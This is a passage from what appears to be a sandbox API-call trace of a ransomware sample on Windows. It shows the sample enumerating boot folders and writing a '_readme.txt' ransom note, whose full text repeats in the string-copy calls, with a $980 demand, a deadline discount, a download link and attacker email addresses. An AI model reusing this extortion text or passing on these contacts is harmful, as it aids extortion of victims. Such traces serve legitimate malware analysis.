0x3b40090 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.726] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.726] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.726] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0165.726] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.726] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.726] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.726] PathFindFileNameW (pszPath="") returned="" [0165.726] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.726] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.727] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.727] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.727] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.727] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.727] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.727] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0165.727] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.727] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.727] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0165.727] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.727] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.727] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.728] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.728] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.728] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.728] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.728] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.728] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.728] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.728] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.728] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.728] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.728] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.729] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.729] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.729] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.729] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.729] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.729] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.729] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.729] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.729] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.729] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.729] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.729] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.729] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.731] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.731] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.732] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.732] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.733] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.733] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.733] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.733] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.733] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.733] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.733] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.733] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.733] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.733] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.733] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.733] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, 